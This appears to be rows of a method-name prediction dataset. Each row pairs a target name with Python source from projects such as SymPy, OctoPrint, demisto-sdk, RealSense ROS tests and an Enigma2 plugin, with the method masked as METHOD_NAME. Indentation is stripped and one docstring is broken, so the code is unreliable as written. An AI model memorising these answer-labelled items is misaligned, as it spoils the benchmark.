X = ImmutableMatrix([[1, 2], [3, 4]])
Y = ImmutableMatrix([[1], [0]])
q, r = X.QRdecomposition()
assert (type(q), type(r)) == (ImmutableMatrix, ImmutableMatrix)
assert type(X.LUsolve(Y)) == ImmutableMatrix
assert type(X.QRsolve(Y)) == ImmutableMatrix
X = ImmutableMatrix([[1, 2], [2, 1]])
assert X.T == X
    assert X.is_symmetric()
assert type(X.cholesky()) == ImmutableMatrix
L, D = X.LDLdecomposition()
assert (type(L), type(D)) == (ImmutableMatrix, ImmutableMatrix)
assert X.is_diagonalizable()
assert X.berkowitz_det() == -3
assert X.norm(2) == 3
assert type(X.eigenvects()[0][2][0]) == ImmutableMatrix
assert type(zeros(3, 3).as_immutable().nullspace()[0]) == ImmutableMatrix
X = ImmutableMatrix([[1, 0], [2, 1]])
assert type(X.lower_triangular_solve(Y)) == ImmutableMatrix
assert type(X.T.upper_triangular_solve(Y)) == ImmutableMatrix
assert type(X.minorMatrix(0, 0)) == ImmutableMatrix
# issue sympy/sympy#6279
# https://github.com/sympy/sympy/issues/6279
# Test that Immutable _op_ Immutable => Immutable and not MatExpr
def test_immutable_evaluation():
X = ImmutableMatrix(eye(3))
A = ImmutableMatrix(3, 3, range(9))
assert isinstance(X + A, ImmutableMatrix)
assert isinstance(X * A, ImmutableMatrix)
assert isinstance(X * 2, ImmutableMatrix)
assert isinstance(2 * X, ImmutableMatrix)
assert isinstance(A**2, ImmutableMatrix)
def test_determinant():
assert ImmutableMatrix(4, 4, lambda i, j: i + j).det() == 0
def test_Equality():
assert Equality(IM, IM) is true
assert Unequality(IM, IM) is false
assert Equality(IM, IM.subs({1: 2})) is false
assert Unequality(IM, IM.subs({1: 2})) is true
assert Equality(IM, 2) is false
assert Unequality(IM, 2) is true
M = ImmutableMatrix([x, y])
assert Equality(M, IM) is false
assert Unequality(M, IM) is true
assert Equality(M, M.subs({x: 2})).subs({x: 2}) is true
assert Unequality(M, M.subs({x: 2})).subs({x: 2}) is false
assert Equality(M, M.subs({x: 2})).subs({x: 3}) is false
assert Unequality(M, M.subs({x: 2})).subs({x: 3}) is true
def test_diff_integrate():
M = Matrix([x, 1]).as_immutable()
assert M.integrate(x) == Matrix([x**2/2, x])
assert M.diff(x) == Matrix([1, 0])
assert M.limit(x, 1) == Matrix([1, 1])
assert zeros(2).as_immutable().integrate(x) == zeros(2) | null |
test basic loading | # -*- coding: utf-8 -*-
# test_reader.py ---
#
# Filename: test_reader.py
# Description:
# Author:
# Maintainer:
# Created: Wed Jul 24 16:02:21 2013 (+0530)
# Version:
# Last-Updated: Sun Apr 17 16:13:01 2016 (-0400)
# By: subha
# Update #: 112
# URL:
# Keywords:
# Compatibility:
#
#
# Commentary:
#
#
#
#
# Change log:
#
#
#
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth
# Floor, Boston, MA 02110-1301, USA.
#
#
# Code:
from __future__ import print_function
import unittest
import numpy as np
import moose
import neuroml as nml
from reader import NML2Reader
import os
class TestFullCell(unittest.TestCase):
def setUp(self):
if '/library' in moose.le():
moose.delete('/library')
self.reader = NML2Reader(verbose=True)
self.lib = moose.Neutral('/library')
self.filename = os.path.realpath('test_files/NML2_FullCell.nml')
self.reader.read(self.filename)
for ncell in self.reader.nml_cells_to_moose:
if self.reader.nml_cells_to_moose[ncell].isA("Neuron"):
self.ncell = self.reader.nml_cells_to_moose[ncell]
break
self.mcell = moose.element('/library/SpikingCell')
self.soma = moose.element(self.mcell.path + '/Soma')
self.dendrite1 = moose.element(self.mcell.path + '/Dendrite1')
self.dendrite2 = moose.element(self.mcell.path + '/Dendrite2')
self.spine1 = moose.element(self.mcell.path + '/Spine1')
def METHOD_NAME(self):
self.assertEqual(self.reader.filename, self.filename, 'filename was not set')
self.assertIsNotNone(self.reader.doc, 'doc is None')
def test_createCellPrototype(self):
self.assertEqual(moose.element(self.mcell).className, 'Neuron')
self.assertEqual(moose.element(self.mcell).name, self.ncell.name)
def test_createMorphology(self):
for comp_id in moose.wildcardFind(self.mcell.path + '/##[ISA=Compartment]'):
comp = moose.element(comp_id)
p0 = self.reader.moose_to_nml[comp].proximal
if p0:
self.assertAlmostEqual(comp.x0, float(p0.x)*1e-6) # Assume micron unit for length
self.assertAlmostEqual(comp.y0, float(p0.y)*1e-6)
self.assertAlmostEqual(comp.z0, float(p0.z)*1e-6)
p1 = self.reader.moose_to_nml[comp].distal
self.assertAlmostEqual(comp.x, float(p1.x)*1e-6)
self.assertAlmostEqual(comp.y, float(p1.y)*1e-6)
self.assertAlmostEqual(comp.z, float(p1.z)*1e-6)
def test_connectivity(self):
"""Test raxial-axial connectivity between MOOSE compartments when
there is parent->child relation in NML2."""
msgs_soma = self.soma.msgIn
msgs_dendrite1 = self.dendrite1.msgIn
msgs_dendrite2 = self.dendrite2.msgIn
self.assertEqual(msgs_soma[3].e1.name, self.dendrite1.name)
self.assertEqual(msgs_dendrite1[3].e1.name, self.dendrite2.name)
self.assertEqual(msgs_dendrite2[3].e1.name, self.spine1.name)
def test_capacitance(self):
for comp_id in moose.wildcardFind(self.mcell.path + '/##[ISA=Compartment]'):
comp = moose.element(comp_id)
# We know that a few um^2 compartment with uF/cm^2 specific capacitance must be around a pico Farad.
self.assertTrue((comp.Cm > 0) and (comp.Cm < 1e-6))
def test_protochans(self):
"""TODO: verify the prototype channel."""
for chan_id in moose.wildcardFind('/library/##[ISA=HHChannel]'):
print(moose.element(chan_id))
def test_HHChannels(self):
"""Verify copied channel in membrane properties."""
self.assertTrue(moose.exists(self.soma.path + '/naChansSoma'))
soma_na = moose.element(self.soma.path+'/naChansSoma')
chans = moose.wildcardFind(self.mcell.path + '/##[ISA=HHChannel]')
self.assertTrue(len(chans) < 3) # Only soma and dendrite2 have the channels
self.assertAlmostEqual(soma_na.Gbar, 120e-2 * self.soma.diameter * self.soma.diameter * np.pi, places=6)
'''
Not yet working in NML2...
class TestGran98(unittest.TestCase):
def setUp(self):
self.reader = NML2Reader()
self.lib = moose.Neutral('/library')
self.filename = 'test_files/Granule_98/Granule_98.nml'
self.reader.read(self.filename)
for ncell in self.reader.nml_to_moose:
if isinstance(ncell, nml.Cell):
self.ncell = ncell
break
self.mcell = moose.element(moose.wildcardFind('/##[ISA=Cell]')[0])
def test_CaPool(self):
pass
'''
if __name__ == '__main__':
unittest.main()
#
# test_reader.py ends here | null |
test list all apps paginated | from unittest import mock
from unittest.mock import MagicMock
import pytest as pytest
from lightning_cloud.openapi import (
Externalv1LightningappInstance,
V1LightningappInstanceSpec,
V1LightningappInstanceState,
V1LightningappInstanceStatus,
V1LightningworkState,
V1ListLightningappInstancesResponse,
V1ListLightningworkResponse,
V1ListMembershipsResponse,
V1Membership,
)
from rich.text import Text
from lightning.app.cli.cmd_apps import _AppList, _AppManager
@pytest.mark.parametrize(
("current_state", "desired_state", "expected"),
[
(
V1LightningappInstanceStatus(phase=V1LightningappInstanceState.RUNNING),
V1LightningappInstanceState.DELETED,
Text("terminating"),
),
(
V1LightningappInstanceStatus(phase=V1LightningappInstanceState.STOPPED),
V1LightningappInstanceState.RUNNING,
Text("restarting"),
),
(
V1LightningappInstanceStatus(phase=V1LightningappInstanceState.PENDING),
V1LightningappInstanceState.RUNNING,
Text("restarting"),
),
(
V1LightningappInstanceStatus(phase=V1LightningappInstanceState.UNSPECIFIED, start_timestamp=None),
V1LightningappInstanceState.RUNNING,
Text("not yet started"),
),
],
)
def test_state_transitions(current_state, desired_state, expected):
actual = _AppList._textualize_state_transitions(current_state=current_state, desired_state=desired_state)
assert actual == expected
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningapp_instance_service_list_lightningapp_instances")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def METHOD_NAME(list_memberships: mock.MagicMock, list_instances: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_instances.side_effect = [
V1ListLightningappInstancesResponse(
lightningapps=[
Externalv1LightningappInstance(
name="test1",
spec=V1LightningappInstanceSpec(desired_state=V1LightningappInstanceState.RUNNING),
status=V1LightningappInstanceStatus(phase=V1LightningappInstanceState.RUNNING),
)
],
next_page_token="page-2",
),
V1ListLightningappInstancesResponse(
lightningapps=[
Externalv1LightningappInstance(
name="test2",
spec=V1LightningappInstanceSpec(desired_state=V1LightningappInstanceState.STOPPED),
status=V1LightningappInstanceStatus(phase=V1LightningappInstanceState.RUNNING),
)
],
),
]
cluster_manager = _AppManager()
cluster_manager.list()
list_memberships.assert_called_once()
assert list_instances.mock_calls == [
mock.call(project_id="default-project", limit=100, phase_in=[]),
mock.call(project_id="default-project", page_token="page-2", limit=100, phase_in=[]), # noqa: S106
]
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningapp_instance_service_list_lightningapp_instances")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def test_list_all_apps(list_memberships: mock.MagicMock, list_instances: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_instances.return_value = V1ListLightningappInstancesResponse(lightningapps=[])
cluster_manager = _AppManager()
cluster_manager.list()
list_memberships.assert_called_once()
list_instances.assert_called_once_with(project_id="default-project", limit=100, phase_in=[])
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningwork_service_list_lightningwork")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def test_list_components(list_memberships: mock.MagicMock, list_components: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_components.return_value = V1ListLightningworkResponse(lightningworks=[])
cluster_manager = _AppManager()
cluster_manager.list_components(app_id="cheese")
list_memberships.assert_called_once()
list_components.assert_called_once_with(project_id="default-project", app_id="cheese", phase_in=[])
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningwork_service_list_lightningwork")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def test_list_components_with_phase(list_memberships: mock.MagicMock, list_components: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_components.return_value = V1ListLightningworkResponse(lightningworks=[])
cluster_manager = _AppManager()
cluster_manager.list_components(app_id="cheese", phase_in=[V1LightningworkState.RUNNING])
list_memberships.assert_called_once()
list_components.assert_called_once_with(
project_id="default-project", app_id="cheese", phase_in=[V1LightningworkState.RUNNING]
)
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch("lightning.app.utilities.network.LightningClient.lightningapp_instance_service_list_lightningapp_instances")
@mock.patch("lightning.app.utilities.network.LightningClient.projects_service_list_memberships")
def test_list_apps_on_cluster(list_memberships: mock.MagicMock, list_instances: mock.MagicMock):
list_memberships.return_value = V1ListMembershipsResponse(memberships=[V1Membership(project_id="default-project")])
list_instances.return_value = V1ListLightningappInstancesResponse(lightningapps=[])
cluster_manager = _AppManager()
cluster_manager.list()
list_memberships.assert_called_once()
list_instances.assert_called_once_with(project_id="default-project", limit=100, phase_in=[])
@mock.patch("lightning_cloud.login.Auth.authenticate", MagicMock())
@mock.patch(
"lightning.app.utilities.network.LightningClient.lightningapp_instance_service_delete_lightningapp_instance"
)
@mock.patch("lightning.app.cli.cmd_apps._get_project")
def test_delete_app_on_cluster(get_project_mock: mock.MagicMock, delete_app_mock: mock.MagicMock):
get_project_mock.return_value = V1Membership(project_id="default-project")
cluster_manager = _AppManager()
cluster_manager.delete(app_id="12345")
delete_app_mock.assert_called()
delete_app_mock.assert_called_once_with(project_id="default-project", id="12345") | null |
is current | __license__ = "GNU Affero General Public License http://www.gnu.org/licenses/agpl.html"
__copyright__ = "Copyright (C) 2019 The OctoPrint Project - Released under terms of the AGPLv3 License"
import logging
import pkg_resources
import requests
from octoprint.util.version import (
get_comparable_version,
is_prerelease,
is_python_compatible,
)
INFO_URL = "https://pypi.org/pypi/{package}/json"
logger = logging.getLogger("octoprint.plugins.softwareupdate.version_checks.pypi_release")
def _filter_out_latest(releases, include_prerelease=False, python_version=None):
"""
    Filters the given releases down to the newest one matching the constraints and returns its version.
Tests:
>>> requires_py2 = ">=2.7.9,<3"
>>> requires_py23 = ">=2.7.9, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*, <4"
>>> requires_py3 = ">=3.6, <4"
>>> releases = {"1.3.12": [dict(requires_python=requires_py2, upload_time_iso_8601="2019-10-22T10:06:03.190293Z")], "1.4.0rc1": [dict(requires_python=requires_py23, upload_time_iso_8601="2019-11-22T10:06:03.190293Z")], "2.0.0rc1": [dict(requires_python=requires_py3, upload_time_iso_8601="2020-10-22T10:06:03.190293Z")]}
>>> _filter_out_latest(releases, python_version="2.7.9")
'1.3.12'
>>> _filter_out_latest(releases, include_prerelease=True, python_version="2.7.9")
'1.4.0rc1'
>>> _filter_out_latest(releases, include_prerelease=True, python_version="3.6.0")
'2.0.0rc1'
>>> _filter_out_latest(releases, python_version="3.6.0")
"""
releases = [{"version": k, "data": v[0]} for k, v in releases.items()]
    # filter out prereleases and versions incompatible with our python
filter_function = lambda release: not is_prerelease(
release["version"]
) and is_python_compatible(
release["data"].get("requires_python", ""), python_version=python_version
)
if include_prerelease:
filter_function = lambda release: is_python_compatible(
release["data"].get("requires_python", ""), python_version=python_version
)
releases = list(filter(filter_function, releases))
if not releases:
return None
# sort by upload date
releases = sorted(
releases, key=lambda release: release["data"].get("upload_time_iso_8601", "")
)
# latest release = last in list
latest = releases[-1]
return latest["version"]
def _get_latest_release(package, include_prerelease):
from ..exceptions import NetworkError
try:
r = requests.get(INFO_URL.format(package=package), timeout=(3.05, 7))
except requests.ConnectionError as exc:
raise NetworkError(cause=exc)
if not r.status_code == requests.codes.ok:
return None
data = r.json()
if "info" not in data or "version" not in data["info"]:
return None
requires_python = data["info"].get("requires_python")
if requires_python and not is_python_compatible(requires_python):
return None
return _filter_out_latest(data["releases"], include_prerelease=include_prerelease)
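# The check below reports "current" when there is no remote version to compare
# against, or when the installed version is at least the latest remote release.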
def METHOD_NAME(release_information):
if release_information["remote"]["value"] is None:
return True
local_version = get_comparable_version(release_information["local"]["value"])
remote_version = get_comparable_version(release_information["remote"]["value"])
return remote_version <= local_version
def get_latest(target, check, online=True, *args, **kwargs):
from ..exceptions import CannotUpdateOffline
if not online and not check.get("offline", False):
raise CannotUpdateOffline()
package = check.get("package")
distribution = pkg_resources.get_distribution(package)
if distribution:
local_version = distribution.version
else:
local_version = None
remote_version = _get_latest_release(
package, include_prerelease=check.get("prerelease", False)
)
information = {
"local": {"name": local_version, "value": local_version},
"remote": {"name": remote_version, "value": remote_version},
}
logger.debug(
"Target: {}, local: {}, remote: {}".format(
target, information["local"]["name"], information["remote"]["name"]
)
)
return information, METHOD_NAME(information) | null |
test depth avg 1 | # Copyright 2023 Intel Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import itertools
import pytest
import rclpy
from sensor_msgs.msg import Image as msg_Image
from sensor_msgs.msg import Imu as msg_Imu
from sensor_msgs.msg import PointCloud2 as msg_PointCloud2
import numpy as np
sys.path.append(os.path.abspath(os.path.dirname(__file__)+"/../utils"))
import pytest_rs_utils
from pytest_rs_utils import launch_descr_with_parameters
from pytest_rs_utils import delayed_launch_descr_with_parameters
from pytest_rs_utils import get_rosbag_file_path
from pytest_rs_utils import get_node_heirarchy
test_params = {"rosbag_filename":get_rosbag_file_path("outdoors_1color.bag"),
'camera_name': 'Vis2_Cam',
'color_width': '0',
'color_height': '0',
'depth_width': '0',
'depth_height': '0',
'infra_width': '0',
'infra_height': '0',
}
'''
This test was ported from rs2_test.py.
The command used to run it is "python3 realsense2_camera/scripts/rs2_test.py vis_avg_2".
'''
@pytest.mark.rosbag
@pytest.mark.parametrize("delayed_launch_descr_with_parameters", [test_params],indirect=True)
@pytest.mark.launch(fixture=delayed_launch_descr_with_parameters)
class TestVis2(pytest_rs_utils.RsTestBaseClass):
def test_vis_2(self,delayed_launch_descr_with_parameters):
params = delayed_launch_descr_with_parameters[1]
data = pytest_rs_utils.ImageColorGetData(params["rosbag_filename"])
themes = [
{'topic':get_node_heirarchy(params)+'/color/image_raw',
'msg_type':msg_Image,
'expected_data_chunks':1,
'data':data
}
]
try:
'''
initialize, run and check the data
'''
self.init_test("RsTest"+params['camera_name'])
ret = self.run_test(themes)
assert ret[0], ret[1]
assert self.process_data(themes)
finally:
self.shutdown()
def process_data(self, themes):
return super().process_data(themes)
test_params_depth = {"rosbag_filename":get_rosbag_file_path("outdoors_1color.bag"),
'camera_name': 'Depth_W_Cloud',
'color_width': '0',
'color_height': '0',
'depth_width': '0',
'depth_height': '0',
'infra_width': '0',
'infra_height': '0',
'enable_pointcloud': 'true'
}
'''
This test was ported from rs2_test.py.
The command used to run it is "python3 realsense2_camera/scripts/rs2_test.py depth_w_cloud_1".
'''
@pytest.mark.rosbag
@pytest.mark.parametrize("launch_descr_with_parameters", [test_params_depth],indirect=True)
@pytest.mark.launch(fixture=launch_descr_with_parameters)
class TestDepthWCloud(pytest_rs_utils.RsTestBaseClass):
def test_depth_w_cloud_1(self,launch_descr_with_parameters):
params = launch_descr_with_parameters[1]
data = pytest_rs_utils.ImageDepthGetData(params["rosbag_filename"])
themes = [
{'topic':get_node_heirarchy(params)+'/depth/image_rect_raw',
'msg_type':msg_Image,
'expected_data_chunks':1,
'data':data
}
]
try:
'''
initialize, run and check the data
'''
self.init_test("RsTest"+params['camera_name'])
ret = self.run_test(themes)
assert ret[0], ret[1]
assert self.process_data(themes)
finally:
self.shutdown()
def process_data(self, themes):
return super().process_data(themes)
test_params_depth_avg_1 = {"rosbag_filename":get_rosbag_file_path("outdoors_1color.bag"),
'camera_name': 'Depth_Avg_1',
'color_width': '0',
'color_height': '0',
'depth_width': '0',
'depth_height': '0',
'infra_width': '0',
'infra_height': '0',
}
'''
This test was ported from rs2_test.py.
The command used to run it is "python3 realsense2_camera/scripts/rs2_test.py depth_avg_1".
'''
@pytest.mark.rosbag
@pytest.mark.parametrize("launch_descr_with_parameters", [test_params_depth_avg_1],indirect=True)
@pytest.mark.launch(fixture=launch_descr_with_parameters)
class TestDepthAvg1(pytest_rs_utils.RsTestBaseClass):
def METHOD_NAME(self,launch_descr_with_parameters):
params = launch_descr_with_parameters[1]
data = pytest_rs_utils.ImageDepthGetData(params["rosbag_filename"])
themes = [
{'topic':get_node_heirarchy(params)+'/depth/image_rect_raw',
'msg_type':msg_Image,
'expected_data_chunks':1,
'data':data
}
]
try:
'''
initialize, run and check the data
'''
self.init_test("RsTest"+params['camera_name'])
ret = self.run_test(themes)
assert ret[0], ret[1]
assert self.process_data(themes)
finally:
self.shutdown()
def process_data(self, themes):
return super().process_data(themes)
| null |
update docker image in script | from typing import Optional, Tuple
from demisto_sdk.commands.common.constants import (
FILETYPE_TO_DEFAULT_FROMVERSION,
TYPE_JS,
TYPE_PWSH,
FileType,
)
from demisto_sdk.commands.common.hook_validations.docker import DockerImageValidator
from demisto_sdk.commands.common.logger import logger
from demisto_sdk.commands.common.tools import is_iron_bank_pack, server_version_compare
from demisto_sdk.commands.format.format_constants import (
ERROR_RETURN_CODE,
SKIP_RETURN_CODE,
SUCCESS_RETURN_CODE,
)
from demisto_sdk.commands.format.update_generic_yml import BaseUpdateYML
class ScriptYMLFormat(BaseUpdateYML):
"""ScriptYMLFormat class is designed to update script YML file according to Demisto's convention.
Attributes:
input (str): the path to the file we are updating at the moment.
output (str): the desired file name to save the updated version of the YML to.
"""
def __init__(
self,
input: str = "",
output: str = "",
path: str = "",
from_version: str = "",
no_validate: bool = False,
update_docker: bool = False,
add_tests: bool = False,
**kwargs,
):
super().__init__(
input,
output,
path,
from_version,
no_validate,
add_tests=add_tests,
**kwargs,
)
self.update_docker = update_docker
if not from_version and self.data.get("type") == TYPE_PWSH:
self.from_version = "5.5.0"
@staticmethod
def METHOD_NAME(
script_obj: dict, file_path: str, from_version: Optional[str] = None
):
        Update the docker image for the passed script object. Does nothing if this is a
        JavaScript script or if the default docker image is used (i.e. none is set).
        Args:
            script_obj (dict): the script object to update in place.
            file_path (str): path to the script's file, used to detect Iron Bank packs.
            from_version (Optional[str]): the script's fromversion; when it is below 5.0.0
                or missing, dockerimage45 is preserved for backwards compatibility.
"""
if script_obj.get("type") == TYPE_JS:
logger.info(
"[yellow]Skipping docker image update as this is a Javascript automation.[/yellow]"
)
return
dockerimage = script_obj.get("dockerimage")
if not dockerimage: # default image -> nothing to do
logger.info(
"[yellow]Skipping docker image update as default docker image is being used.[/yellow]"
)
return
image_name = dockerimage.split(":")[0]
try:
if is_iron_bank_pack(file_path):
latest_tag = DockerImageValidator.get_docker_image_latest_tag_from_iron_bank_request(
image_name
)
else:
latest_tag = DockerImageValidator.get_docker_image_latest_tag_request(
image_name
)
if not latest_tag:
logger.info("[yellow]Failed getting docker image latest tag[/yellow]")
return
except Exception as e:
logger.info(
f"[yellow]Failed getting docker image latest tag. {e} - Invalid docker image[/yellow]"
)
return
full_name = f"{image_name}:{latest_tag}"
if full_name != dockerimage:
logger.info(f"Updating docker image to: {full_name}")
script_obj["dockerimage"] = full_name
if (not from_version) or server_version_compare("5.0.0", from_version) > 0:
            # If this is a script that supports 4.5 and earlier, make sure dockerimage45 is set
if not script_obj.get("dockerimage45"):
logger.info(
f"Setting dockerimage45 to previous image value: {dockerimage} for 4.5 and earlier support"
)
script_obj["dockerimage45"] = dockerimage
else:
logger.info(
f"Already using latest docker image: {dockerimage}. Nothing to update."
)
def update_docker_image(self):
if self.update_docker:
self.METHOD_NAME(
self.data, self.source_file, self.data.get(self.from_version_key)
)
def run_format(self) -> int:
try:
logger.info(
f"\n[blue]================= Updating file {self.source_file} =================[/blue]"
)
super().update_yml(
default_from_version=FILETYPE_TO_DEFAULT_FROMVERSION[FileType.SCRIPT],
)
self.update_tests()
self.update_docker_image()
self.save_yml_to_destination_file()
return SUCCESS_RETURN_CODE
except Exception as err:
logger.info(
f"\n[red]Failed to update file {self.source_file}. Error: {err}[/red]"
)
return ERROR_RETURN_CODE
def format_file(self) -> Tuple[int, int]:
"""Manager function for the integration YML updater."""
format_res = self.run_format()
if format_res:
return format_res, SKIP_RETURN_CODE
else:
return format_res, self.initiate_file_validator() | null |
key cancel | from Screens.Screen import Screen
from Components.ConfigList import ConfigListScreen
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigSlider, getConfigListEntry
config.plugins.VideoClippingSetup = ConfigSubsection()
config.plugins.VideoClippingSetup.clip_left = ConfigInteger(default=0)
config.plugins.VideoClippingSetup.clip_width = ConfigInteger(default=720)
config.plugins.VideoClippingSetup.clip_top = ConfigInteger(default=0)
config.plugins.VideoClippingSetup.clip_height = ConfigInteger(default=576)
class VideoClippingCoordinates(Screen, ConfigListScreen):
skin = """
<screen position="0,0" size="e,e" title="Video clipping setup" backgroundColor="transparent">
<widget name="config" position="c-175,c-75" size="350,150" foregroundColor="black" backgroundColor="transparent" />
<ePixmap pixmap="buttons/green.png" position="c-145,e-100" zPosition="0" size="140,40" alphatest="on" />
<ePixmap pixmap="buttons/red.png" position="c+5,e-100" zPosition="0" size="140,40" alphatest="on" />
<widget name="ok" position="c-145,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="green" />
<widget name="cancel" position="c+5,e-100" size="140,40" valign="center" halign="center" zPosition="1" font="Regular;20" transparent="1" backgroundColor="red" />
</screen>"""
def __init__(self, session):
self.skin = VideoClippingCoordinates.skin
Screen.__init__(self, session)
from Components.ActionMap import ActionMap
from Components.Button import Button
self["ok"] = Button(_("OK"))
self["cancel"] = Button(_("Cancel"))
self.setTitle(_("Video clipping setup"))
self["actions"] = ActionMap(["SetupActions", "ColorActions", "MenuActions"],
{
"ok": self.keyGo,
"save": self.keyGo,
"cancel": self.METHOD_NAME,
"green": self.keyGo,
"red": self.METHOD_NAME,
"menu": self.closeRecursive,
}, -2)
self.list = []
ConfigListScreen.__init__(self, self.list, session=session)
left = config.plugins.VideoClippingSetup.clip_left.value
width = config.plugins.VideoClippingSetup.clip_width.value
top = config.plugins.VideoClippingSetup.clip_top.value
height = config.plugins.VideoClippingSetup.clip_height.value
self.clip_step = ConfigSlider(default=1, increment=1, limits=(1, 20))
self.clip_left = ConfigSlider(default=left, increment=self.clip_step.value, limits=(0, 720))
self.clip_width = ConfigSlider(default=width, increment=self.clip_step.value, limits=(0, 720))
self.clip_top = ConfigSlider(default=top, increment=self.clip_step.value, limits=(0, 576))
self.clip_height = ConfigSlider(default=height, increment=self.clip_step.value, limits=(0, 576))
self.list.append(getConfigListEntry(_("step size"), self.clip_step))
self.list.append(getConfigListEntry(_("left"), self.clip_left))
self.list.append(getConfigListEntry(_("width"), self.clip_width))
self.list.append(getConfigListEntry(_("Top"), self.clip_top))
self.list.append(getConfigListEntry(_("height"), self.clip_height))
self["config"].list = self.list
self["config"].l.setList(self.list)
def adjustStep(self):
self.clip_left.increment = self.clip_step.value
self.clip_width.increment = self.clip_step.value
self.clip_top.increment = self.clip_step.value
self.clip_height.increment = self.clip_step.value
def keyLeft(self):
ConfigListScreen.keyLeft(self)
self.adjustStep()
self.setPreviewPosition()
def keyRight(self):
ConfigListScreen.keyRight(self)
self.adjustStep()
self.setPreviewPosition()
def setPreviewPosition(self):
setPosition(int(self.clip_left.value), int(self.clip_width.value), int(self.clip_top.value), int(self.clip_height.value))
def keyGo(self):
config.plugins.VideoClippingSetup.clip_left.value = self.clip_left.value
config.plugins.VideoClippingSetup.clip_width.value = self.clip_width.value
config.plugins.VideoClippingSetup.clip_top.value = self.clip_top.value
config.plugins.VideoClippingSetup.clip_height.value = self.clip_height.value
config.plugins.VideoClippingSetup.save()
self.close()
def METHOD_NAME(self):
setConfiguredPosition()
self.close()
def setPosition(clip_left, clip_width, clip_top, clip_height):
if clip_left + clip_width > 720:
clip_width = 720 - clip_left
if clip_top + clip_height > 576:
clip_height = 576 - clip_top
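	# The vmpeg clip_* proc entries expect hexadecimal values, hence the '%X' formatting below.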
try:
file = open("/proc/stb/vmpeg/0/clip_left", "w")
file.write('%X' % clip_left)
file.close()
file = open("/proc/stb/vmpeg/0/clip_width", "w")
file.write('%X' % clip_width)
file.close()
file = open("/proc/stb/vmpeg/0/clip_top", "w")
file.write('%X' % clip_top)
file.close()
file = open("/proc/stb/vmpeg/0/clip_height", "w")
file.write('%X' % clip_height)
file.close()
except:
return
def setConfiguredPosition():
setPosition(int(config.plugins.VideoClippingSetup.clip_left.value), int(config.plugins.VideoClippingSetup.clip_width.value), int(config.plugins.VideoClippingSetup.clip_top.value), int(config.plugins.VideoClippingSetup.clip_height.value))
def main(session, **kwargs):
session.open(VideoClippingCoordinates)
def startup(reason, **kwargs):
setConfiguredPosition()
def startMain(menuid):
if menuid != "video_menu":
return []
return [(_("Video clipping"), main, "video_clipping", 10)]
def Plugins(**kwargs):
from os import path
if path.exists("/proc/stb/vmpeg/0/clip_left"):
from Plugins.Plugin import PluginDescriptor
return [PluginDescriptor(name="Video clipping setup", description="", where=PluginDescriptor.WHERE_SESSIONSTART, fnc=startup),
PluginDescriptor(name=_("Video clipping"), description=_("clip overscan / letterbox borders"), where=PluginDescriptor.WHERE_MENU, needsRestart=False, fnc=startMain)]
return [] | null |
function thread safety handler fn arn | import json
from time import sleep
import pytest
from tests.e2e.utils import data_fetcher
from tests.e2e.utils.data_fetcher.common import GetLambdaResponseOptions, get_lambda_response_in_parallel
@pytest.fixture
def ttl_cache_expiration_handler_fn_arn(infrastructure: dict) -> str:
return infrastructure.get("TtlCacheExpirationHandlerArn", "")
@pytest.fixture
def ttl_cache_timeout_handler_fn_arn(infrastructure: dict) -> str:
return infrastructure.get("TtlCacheTimeoutHandlerArn", "")
@pytest.fixture
def parallel_execution_handler_fn_arn(infrastructure: dict) -> str:
return infrastructure.get("ParallelExecutionHandlerArn", "")
@pytest.fixture
def METHOD_NAME(infrastructure: dict) -> str:
return infrastructure.get("FunctionThreadSafetyHandlerArn", "")
@pytest.fixture
def optional_idempotency_key_fn_arn(infrastructure: dict) -> str:
return infrastructure.get("OptionalIdempotencyKeyHandlerArn", "")
@pytest.fixture
def idempotency_table_name(infrastructure: dict) -> str:
return infrastructure.get("DynamoDBTable", "")
@pytest.mark.xdist_group(name="idempotency")
def test_ttl_caching_expiration_idempotency(ttl_cache_expiration_handler_fn_arn: str):
# GIVEN
payload = json.dumps({"message": "Powertools for AWS Lambda (Python) - TTL 5s"})
# WHEN
# first execution
first_execution, _ = data_fetcher.get_lambda_response(
lambda_arn=ttl_cache_expiration_handler_fn_arn,
payload=payload,
)
first_execution_response = first_execution["Payload"].read().decode("utf-8")
# the second execution should return the same response as the first execution
